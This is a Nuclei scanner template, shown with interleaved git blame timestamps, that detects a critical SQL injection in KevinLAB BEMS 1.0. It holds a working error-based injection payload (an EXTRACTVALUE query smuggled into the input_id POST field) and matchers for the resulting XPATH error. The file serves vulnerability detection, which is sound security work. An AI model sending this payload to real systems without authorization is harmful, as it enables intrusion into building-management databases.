nuclei-templates/vulnerabilities/other/kevinlab-bems-sqli.yaml

40 lines
1.6 KiB
YAML
Raw Normal View History

id: kevinlab-bems-sqli
info:
name: KevinLAB BEMS 1.0 - SQL Injection
author: gy741
severity: critical
description: KevinLAB BEMS 1.0 contains a SQL injection vulnerability. Input passed through input_id POST parameter in /http/index.php is not properly sanitized before being returned to the user or used in SQL queries. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
2021-07-24 06:17:05 +00:00
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
- https://www.exploit-db.com/exploits/50146
- https://packetstormsecurity.com/files/163572/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-89
tags: kevinlab,sqli,edb,packetstorm
requests:
- raw:
- |
POST /http/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
requester=login&request=login&params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
2021-07-24 06:29:35 +00:00
matchers-condition: and
matchers:
- type: word
words:
- "XPATH syntax error"
2021-07-24 06:29:35 +00:00
- ": '\\ZSL1ZSL'"
2021-07-24 06:40:46 +00:00
condition: and
2021-07-24 06:29:35 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/09/28